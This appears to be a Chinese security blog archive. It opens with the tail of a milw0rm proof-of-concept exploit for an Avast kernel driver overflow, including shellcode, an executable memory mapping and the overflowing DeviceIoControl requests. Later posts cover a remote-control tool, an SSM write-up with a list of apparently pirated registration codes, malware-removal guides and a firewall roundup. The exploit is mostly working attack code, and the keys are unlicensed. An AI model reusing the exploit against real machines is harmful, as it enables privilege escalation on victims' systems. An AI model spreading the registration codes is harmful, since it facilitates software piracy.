        0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
        0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
        0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
        0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
        0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
        0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
        0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
        0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
        0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
        0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
        0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
        0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
        0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
        0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
        0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
        0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
        0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
        0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
        0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
        0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
        0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
        0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
        0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
        0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
        0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
        0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
        0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
        0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
        0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
        0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
        0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
        0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
        0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
        0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
        0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
        0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
        0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
        0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
        0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
        0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
        0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
        0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
        0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
        0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
        0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
        0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
        0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
        0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
        0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
        0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
        0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
        0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
        0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
        0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
        0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
        0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
        0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
        0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
        0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
        0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
        0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
        0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
        0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
        0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
        0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
        0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
        0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
        0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
        0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
        0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
        0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
        0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
        0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
        0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
        0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
        0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
        0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
        0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
        0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
        0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
        0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
        0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
        0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
        0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
        0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
        0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549,
        0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
        0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
        0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
        0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
        0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
        0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
        0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
        0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
        0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
        0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
        0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
        0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
        0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
        0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
        0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
        0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
        0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
        0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
        0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
        0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
        0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
        0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
        0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
        0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
        0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
        0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
        0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
        0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
        0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
        0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
        0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
        0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
        0xe8f62f56, 0x58f7969a
        };

    DWORD ShellcodeToExecute;   /* assigned below, never read */
    
    int choix;                  /* unused */
    /* welcome/out are prepared but never used afterwards. */
    memset(welcome, 0x61, 100);
    welcome[100] = 0;

    ZeroMemory(out,sizeof(out));

    printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept…\n\n");
    getch();
    
    /* Step 1: fill the three placeholders in ShellcodeMaster. */
    MajShellcode("LocalEscalation_Avast.exe");
    MajRealShellcode();
    MajRealStack();
    
    /* Step 2: fixed RWX mapping at 0x57520000 (reserve, then commit).
     * NOTE(review): neither call's result is checked. */
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    /* Stub first, kernel payload immediately after it. */
    memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
    memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));
    
    printf("Connecting…    ");
    
    /* Step 3: open the filter driver's control device; the device must be
     * openable by a limited user for the PoC to work at all.  Retries
     * forever, once a second, until CreateFile succeeds. */
    hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    while(hDevice == (HANDLE) 0xffffffff){
      hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
      Sleep(1000);
    }
    printf("Found !\nHandle : %p\n",hDevice);
      
    /* The overflowing request: Crashing as input, no output buffer,
     * sent twice.  Return values are not checked. */
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    /* Step 4: directory listing — presumably to push file-system activity
     * through the filter driver; the reason is not stated in this file. */
    AfficherListeFichiers();
    printf("Written.\n");

    CloseHandle(hDevice);
    getch();
    return 0;
}

// milw0rm.com [2009-08-24]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/103

可穿透防火墙的远程控制软件-TeamViewer V4.1.6080 绿色汉化版下载

       TeamViewer是一个在任何防火墙和NAT代理的后台用于远程控制,桌面共享和文件传输的简单且快速的解决方案。

可穿透防火墙的远程控制软件-TeamViewer V4.1.6080

软件主界面

       为了连接到另一台计算机,只需要在两台计算机上同时运行TeamViewer即可而不需要进行一个安装的过程。该软件第一次启动在两台计算机上自动生成伙伴ID和密码。只需要输入你的伙伴的ID到TeamViewer并输入对方的密码进行身份确认就能立即建立起连接。

       这款软件是一款能穿透内网的远程控制软件,可以穿透各种防火墙,要求双方都安装这个软件,使用时双方打开软件并接受连接即可。最大优势在于任何一方都不需要拥有固定IP地址,双方可以相互控制,只要连入Internet即可,不受防火墙影响!

      产品新功能:
      支持4种连接方式:远程支持、演示、文件传输、VPN
      完全支持Windows Vista UAC和远程登录。 TeamViewer 现在能够远程控制运行在 Vista 安全桌面下的 Windows 操作系统
      通过使用更好的编码和压缩提供了高度提升的性能的连接稳定性
      TeamViewer 现在是仅仅是一个单独的应用程序,由于使用新的代码库 TeamViewer 和 DynaGate 现在不再分离了
      现可在 TeamViewer 里在为您的伙伴的 ID 设定别名了
      自动代理检测现在支持 Firefox 和 Opera 浏览器
      远程监视器之间的多显示器处理和切换
      为 customer module creator 的扩展设计选项
      提高的文件传输性能和全自动恢复
      完整的国际化字符支持 (Unicode)
      提高了的处理,可用性和易于使用
      支持在软件创建的动态密码基础上再次生成新的动态密码,或者设定自己的固定密码;设定的固定密码优先级高于软件创建的随机动态密码。注意:固定密码一旦泄露或被猜中,任何知道伙伴ID的人都可以随时连入,因此应使用足够长的强密码并定期更换。
      安全性:Teamviewer使用包括RSA公钥/私钥交换和256位AES会话加密的加密方式,基于https/SSL同等安全级别;此外所有程序文件都经过数字证书签名以方便确认文件来源。

      点此下载TeamViewer 4.1.6080 绿色汉化版

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/108

介绍一款Hips安全监控工具–System Safety Monitor,附终身免费序列号

      题记:即使自己已经装了杀毒软件、防火墙但仍然跟不上木马病毒的脚步,不断中招?那么你需要一款功能强大的Hips软件对系统进行全面防护。本文的主角就是这样的软件。
      简介:
  SSM全名“System Safety Monitor”,简称SSM。是一款俄罗斯出品的系统监控软件,通过监视系统特定的文件(如注册表等)及应用程序,达到保护系统安全的目的。是一款对系统进行全方位监测的防火墙工具,它不同于传统意义上的防火墙,系针对操作系统内部的存取管理,因此与任何网络/病毒防火墙都是不相冲突的。该软件获得了WebAttack的五星编辑推荐奖,十分优秀!是一款很好的HIPS。
  【平台兼容】:
  兼容9X/NT/2K 95% ;XP 100% (Vista暂时不兼容free版本,其他版本运行不稳定)
  【功能特性】:
   免费版AD+RD,商业注册版AD+FD+RD
  · 可控制机器上哪些程序是允许执行的,当待运行程序被修改时,会报警提示;
  · 可控制“DLL注入”以及键盘记录机对特定系统函数的调用;
  · 可控制驱动程序的安装(包括非传统方式的驱动型漏洞-Rootkits);
  · 可控制诸如存取"\Device\PhysicalMemory"对象这类底层活动;
  · 可阻止未经认可的代码注入,从而使任何程序都无法插入到合法的程序中以进行有害的活动;
  · 可控制哪些程序允许启动其它程序、哪些程序不允许被其它程序启动,如:您可以控制您的浏览器不被除Explorer.EXE以外的任何非可信程序启动;
  · 可在双模式中任选其一,用户模式或管理员模式:管理员模式可设定首选项并加以密码保护防止被更改,而用户模式不能更改任何设定;
  · 可监控安装新程序时注册表重要分支键的更改,受保护的注册表分支键被尝试更改时将阻止或报警;
  · 可管理自启动项目、当前进程等,另外提供了服务保护模块,用以监视已安装的系统服务,当新的服务被添加时,会报警提示;
  · 可(实时)监视"启动菜单"、"启动INI文件分支",以及IE设定等(包括BHO-所谓的浏览器辅助对象,一般都是广告程序、间谍程序等垃圾);
  · 可通过标题黑名单过滤器阻止打开指定的窗口或者网页;
  · 支持外挂任一调试器、反病毒软件等,且该软件的扩展功能均采用外挂插件形式实现因此极易得到丰富的扩充;
  · 本身作为服务加载,通过配置、修改可以实现隐秘的进程反杀能力。
  SSM的上述强大功能为木马防范乃至整个系统的全面监控提供了绝佳的解决方案,但在使用上有一定门槛,总体来说是一款偏向高端用户的安全软件。狐狸少爷测试了多款木马、键盘记录机等对自己的机器进行攻防实训,均被其成功截获,其底层防御能力相当令人满意,而且对于新手熟悉操作系统有非常大的帮助。

  点此下载System Safety Monitor Beta 2.4.0.622 多国语言版

      附注册码一组:

84F30DEE02220CC51A804DBF8729077A9FBCD4AD957B33

A8116019793DBA4EF72CFAC3901E4317738A1F49A12B519ABCF6BF87E89410

57689AF52DFC8DC99EE1A45185D085FB2ECB60DC3B83C926DA3451F4981F2239

02B667DCCAD9A3EF752A103DC6CA88899201EB305D4D119F664FB079A38529

B9105DF65D89F293A9C914990C8B7BAC7277846BBC719BB91ACD562

F4A37DA6CDF1DFD5ECD670CC2FD50614B617843BA912071D2FE5D

FCBD83091A2A0BECEFF2E4719698161C836A34A4B01E56C53DC838A

D09433F661E8F98793425A1A1BA1E013D04C400578E9DF74A040F2CE6

EA78829A30C8380ADC0530B78DB4C079B329DACBD590920B8D435B6F05

DB1F6C9C1FDEFF32A02E72BE82EB90C01CFEC659EB5AAD23B875851D0A

8608F88A74A0E545A1FD0DE91C536557F1775E13AD09AD9D5ED16D9F7BA9

ED889D905EEE8911E6C2C1B8F956CD9B1574D4B843994BC2524E1AC45CB610CD

E461F78E3CE56E170B3C0C78F74EFC4651CFE165039B5D512491E0D5F861F0B02

B4A27D97E800411E4344708AE1AA2AA117B3C779A3BCD7AF3ACFB275A80041

1E4344708AE0000BE1CAA114A25AB41B41B46437A26524E00010000E65E80F

B0C82A64C638BA2374D3172988B6ECA37D94199A04AFD604B4C82EDD83818D988

D203F03026777D3B502A95E5B6F4FB46A858B5D94D31C16177FC8E159770D46E17

F71DED28E5FDA84665160EAD2B3E5ECB8ADEC97D9E4010668C65C2584409D077

9E429F6A683E9D865BE091E8BEAF3483234D605EF7F4DE276E5900DCBE41779

A97E6F135106AF5AC8BA18F58689202DE95088F9AC6370AA1ED038746AD1EA975

AD1CF30F677897A941B75716D3D28AAA430B6B6845ED735BCCDDB49222633A444B

D7C8D2A753A7AEAA9456823B42EAC57FD4955092A05260B2B724FBE01C0CCC6290380

DE4BFB5F46696DDC766B8A71EAB3C3937CB096DFDF15BFB

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/146

killkb.dll和pcidump.Sys等病毒清除解决方案

  killkb.dll和pcidump.Sys等病毒清除解决方案,来源:麦田守望者,www.2000xg.net

  病毒症状:
  该样本是使用“Delphi”编写的AV杀手木马,“upx”加壳,长度为“33,280”,病毒扩展名为“exe”,主要通过“文件捆绑”、“局域网下载器下载”、“网页挂马”等方式传播,病毒主要目的为关闭大量安全软件和下载木马病毒至用户主机运行。
  用户中毒后,会出现计算机及网络运行缓慢,安全软件无故关闭,各类软件、Windows无故报错,自动打开恶意网站,发现大量未知进程等现象。
  感染对象:
  Windows 2000/Windows XP/Windows 2003
  传播途径:
  网页木马、文件捆绑。
  病毒分析:
  (1)创建互斥体“bboy” 防止二次运行;
  (2)设置%SystemRoot%\system32和%temp% 目录的权限为everyone完全控制;
  (3)禁止ekrn服务,结束kern.exe egui.exe scanfrm.exe进程;
  (4)释放动态库文件%SystemRoot%\system32\killkb.dll,遍历进程,查找RavMonD.exe进程,没有发现,加载动态库文件,如果发现进程,不加载动态库文件;
  (5)动态库文件会释放驱动文件,创建服务启动驱动,结束大部分安全软件进程,重命名驱动文件为OLD16.tmp;
  (6)释放%SystemDriver%\WINDOWSaboy.Dll并且加载;
  (7)释放%SystemRoot%\system32\drivers\pcidump.sys,创建pcidump服务启动,删除驱动文件;
  (8)打开puid服务,如果成功,删除服务,删除文件%SystemRoot%\system32\drivers\puid.sys;
  (9)修改HOSTS文件,屏蔽大量网站;
  (10)从指定网站下载病毒,并运行。
  病毒创建注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UpdateDATA
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\acpidump
  病毒创建文件:
  %SystemRoot%\system32\killkb.dll
  %SystemRoot%\system32\drivers\acpiec.Sys
  %SystemDriver%\WINDOWSaboy.Dll
  %SystemRoot%\system32\drivers\pcidump.Sys
  %SystemRoot%\system32\drivers\OLD16.tmp
  病毒访问网络:
  
  http://www.r**8d.cn/out.txt(原文已对域名作部分隐去)
  手动解决办法:
  手动删除以下文件:
  %SystemRoot%\system32\killkb.dll
  %SystemDriver%\WINDOWSaboy.Dll
  %SystemRoot%\system32\drivers\pcidump.Sys
  %SystemRoot%\system32\drivers\OLD16.tmp
  %SystemRoot%\system32\drivers\acpiec.Sys(上文“病毒创建文件”一节列出了该文件,但原清除步骤未包含,建议一并检查并删除)
  注意:驱动文件在被加载时可能无法直接删除,建议先停止并删除对应服务,或在安全模式下操作。
  手动删除以下注册表值:
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UpdateDATA
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\acpidump
  变量声明:
  %SystemDriver% 系统所在分区,通常为“C:\”
  %SystemRoot% WINDOWS所在目录,通常为“C:\Windows”
  %Documents and Settings% 用户文档目录,通常为“C:\Documents and Settings”
  %Temp% 临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
  %ProgramFiles% 系统程序默认安装目录,通常为:“C:\Program Files”

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/226

winlogin.scr等病毒详解与清除方案

    winlogin.scr等病毒详解与清除方案,来源:麦田守望者,www.2000xg.com 
  病毒症状:
  该样本是使用“Delphi”编写的后门程序,长度为“753,152 字节”,病毒扩展名为“exe”,主要通过“文件捆绑”、“下载器下载”、“网页木马”等方式传播,病毒主要目的为设立后门,使用户电脑沦为傀儡主机。
  用户中毒后,可能会出现计算机无故重启、关闭,重要文件丢失,系统及网络缓慢、摄像头无故启用、程序无故关闭、注册表被修改、出现各类病毒等导致用户隐私泄露及影响用户使用的现象。
  感染对象:
  Windows 2000/Windows XP/Windows 2003
  传播途径:
  网页挂马、文件捆绑、下载器下载。
  病毒分析:
  (1)读取并解密自己配置信息;
  (2)复制自身到%SystemRoot%\winlogin.scr;
  (3)注册服务,启动病毒;
  (4)创建svchost.exe进程,把病毒代码注入进程;
  (5)创建批处理文件删除自身;
  (6)尝试连接黑客主机。
  病毒创建文件:
  %SystemRoot%\winlogin.scr
  %SystemRoot%\uninstal.bat
  病毒删除文件:
  %SystemRoot%\uninstal.bat
  病毒创建注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1
  病毒创建进程:
  svchost.exe
  病毒访问网络:
  huangw***21.3322.org:7000
  解决方案:
  1、手动删除以下文件:
  %SystemRoot%\winlogin.scr
  2、手动删除以下注册表值:
  键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1
  变量声明:
  %SystemDriver%  系统所在分区,通常为“C:\”
  %SystemRoot%  WINDOWS所在目录,通常为“C:\Windows”
  %Documents and Settings%  用户文档目录,通常为“C:\Documents and Settings”
  %Temp%  临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
  %ProgramFiles%  系统程序默认安装目录,通常为:“C:\Program Files”

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/227

特别奉献二–09年国内外免费个人防火墙大搜罗

      前一段时间写了一篇免费杀毒软件的文章,此文可以作为它的姊妹篇。
      同上一篇文章,愿意让自己的机器在网络上裸奔或者愿意为软件防火墙支付银子的请跳过此文。
      注:本文仅讨论免费个人软件防火墙,硬件防火墙和企业级防火墙不在讨论之列(实际上硬件防火墙基本上没有免费的:),除非自己动手搭建)

Comodo Personal Firewall
      出品公司:Comodo Security Solutions, Inc.
      Comodo Personal Firewall这是一款功能强大、高效的且容易使用的防火墙,被很多媒体誉为No.1的防火墙,提供了针对网络和个人用户的最高级别的保护,从而阻挡黑客的进入和个人资料的泄露。能够提供程序访问网络权限的底层最全面的控制能力,提供网络窃取的最终抵制,实时流量监视器可以在发生网络窃取和洪水攻击时迅速作出反应,通过简单的界面安装后,Comodo 个人防火墙使您安全的连接到互联网。针对网络攻击完备的安全策略,迅速抵御黑客和网络欺诈。使用友好的点击式用户界面来确认或阻拦网络访问;完全免疫攻击;通过使您的PC隐身而抵御黑客攻击;免费的升级维护;静默式安全单元–避免不必要的安全警报。使您的PC在内外网中受到保护、在常规端口扫描时隐身、不被特洛伊木马程序访问,使您的个人资料不被窃取,使您的PC和网络得到最终的保护。
      现在官方不提供Comodo Personal Firewall单独下载,取而代之的是Comodo Internet Security,最新版本3.8.65951.477,集成了防火墙和防病毒软件,安装时可自由选择。

      官方网址:http://personalfirewall.comodo.com/

ZoneAlarm Free Firewall
      出品公司:Check Point
      ZoneAlarm的设计是为了保护你的ADSL联机避免被黑客攻击。这个程序包含了四个连锁的安全服务;防火墙、应用程控、一个因特网保护锁、和防护区。ZoneAlarm Security Suite 版本增加了 IM Security 及 Web Filtering 的功能。它还为用户准备了不同的安全级别和网络锁定功能。又是一款非常可口的“免费大餐”,它可以防止“特洛伊木马”程序在你的电脑中偷偷作乱。ZoneAlarm可以监视电脑中到底有什么软件在偷偷运行,从而使你免受坏人在你的电脑中窃取资料或是搞破坏。它还为用户准备了不同的安全级别和网络锁定功能。该软件的最大特点就是使用简单,运行稳定,系统资源占用率也相当少,对应用程序访问网络请求监控严格。
      
      官方网址:http://www.zonealarm.com

费尔个人防火墙专业版
      出品公司:费尔安全实验室
      费尔个人防火墙专业版是费尔安全实验室最重要的产品之一,它不仅功能非常强大,而且简单易用,既能满足专业人士的需求也可让一般用户很容易操控。它可以为你的计算机提供全方位的网络安全保护,而且完全免费。
      它可以实现:阻止网络蠕虫病毒的攻击;阻止霸王插件,并允许自定义规则阻止新的霸王插件,广告和有害网站等;应用层与核心层双重过滤系统可以提供双重保护;Windows信任验证技术可以自动信任安全的程序,而不再需要询问用户,增加程序的智能性和易用性;内置了 7 大模式供不同需求的用户选择;交互式规则生成器使生成规则简单易行;密码保护可以保护防火墙的规则和配置不被他人修改;可以非常方便的对规则进行备份和恢复;可以控制对网站的访问,阻止霸王插件就是使用此功能实现;支持文本和二进制两种格式的日志。文本日志更容易查阅,二进制日志可以方便的查询和生成控管规则等扩充功能;它还支持在线升级、流量示波器、隐私保护、Windows 安全中心、气球消息警示以及更多独特的功能。
      作为一款开源防火墙,我们相信它可以走的更远。

      官方网址:http://www.filseclab.com/chs/default.htm

System Safety Monitor free
      出品公司:未知
      System Safety Monitor (SSM)是一款对系统进行全方位监测的防火墙工具,它不同于传统意义上的防火墙,系针对操作系统内部的存取管理,因此与任何网络/病毒防火墙都是不相冲突的。该软件获得了WebAttack的五星编辑推荐奖,十分优秀。
      功能特性: · 可控制机器上哪些程序是允许执行的,当待运行程序被修改时,会报警提示; 可控制“DLL注入”以及键盘记录机对特定系统函数的调用; 可控制驱动程序的安装(包括非传统方式的驱动型漏洞-Rootkits); 可控制诸如存取"\Device\PhysicalMemory"对象这类底层活动。
      很可惜由于此软件作者没有时间继续开发,在08年9月停止更新,当前最新版本:2.0.8.585

      国内下载地址:http://www.skycn.com/soft/42082.html

SoftPerfect Personal Firewall
      出品公司:SoftPerfect Research
      为保护您的电脑免受来自于因特网或局域网攻击而设计的一款免费的网络防火墙。使用该防火墙,用户可以通过包过滤定义规则来自定义安全策略。它在底层工作,允许创建诸如ARP的基于非IP端口的规则。SoftPerfect 个人防火墙支持多网卡。您可以为每个网络设备单独定义规则,比如说拨号适配器或其它系统接口。结合灵活的网络过滤系统、受信MAC地址检测特性和多网卡独立配置功能您甚至可以将其应用于路由器和服务器上。SoftPerfect 个人防火墙有学习机制,当检测到无法判定的网络数据包时它会提示您,让您选择进行何种处理动作。这种机制可以帮您快速建立自定义规则。本软件简单易用,内置多种预定义规则,且其完全免费。还可以提供诸如密码保护、登录保护等特性。
      当前最新版本:1.4.1

      官方网址:http://www.softperfect.com

风云防火墙个人版
     出品公司:风云安全阵线
     您不需要复杂的设置,风云防火墙在简约人性化方面考虑周详,在您安装了风云防火墙之后,它便开始防护您的系统网络安全,抵抗已知类型的网络扫描及攻击,同时又为高级用户提供了丰富多面的细节监测功能。
      特色功能:密码保护功能;ARP局域防护;CRC程序检测——CRC程序完整性验证,防止网络访问程序被恶意软件或病毒木马篡改;木马特征拦截;自我安全保护。
      最新版本:风云防火墙个人版2009
      
      官方地址:http://www.218.cc/

天网防火墙
      出品公司:众达天网
      天网防火墙个人版(简称为天网防火墙)是由天网安全实验室研发制作给个人计算机使用的网络安全工具。它根据系统管理者设定的安全规则(Security Rules)把守网络,提供强大的访问控制、应用选通、信息过滤等功能。它可以帮你抵挡网络入侵和攻击,防止信息泄露,保障用户机器的网络安全。天网防火墙把网络分为本地网和互联网,可以针对来自不同网络的信息,设置不同的安全方案,它适合于任何方式连接上网的个人用户。
      作为新手入门级的免费防火墙,曾经在国内拥有大量用户,功能算不上强大但也算比较全面。
      最新版本:3.0.0.1015
      
      官方地址:http://www.sky.net.cn/

      总算写完了,曾经有许多优秀的免费防火墙产品,但要么转向收费,要么倒闭,文中的几款都是本人经过挑选发布的,希望以后大家能有更多可供选择的产品。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/248

卡巴斯基称中国盗版用达8000万 无意完全打击

      昨天下午,卡巴斯基亚太区董事总经理张立申透露,卡巴斯基目前在中国的盗版用户已经达到了8000万,不过公司目前并没有完全在针对盗版用户进行打击。张立申表示,目前卡巴斯基在中国每天有20万激活码被领用,按照这样的进度,今年再增加3000万的用户应该没有问题。由于卡巴斯基现在在中国的收入稳定,市场增长迅速,卡巴斯基不会效仿微软的做法,打击盗版用户,用户只要通过该公司公布的合法途径,就能得到激活码。

      不过他也同时坦承,卡巴斯基目前还没有特别好的方案完全应对盗版现象。

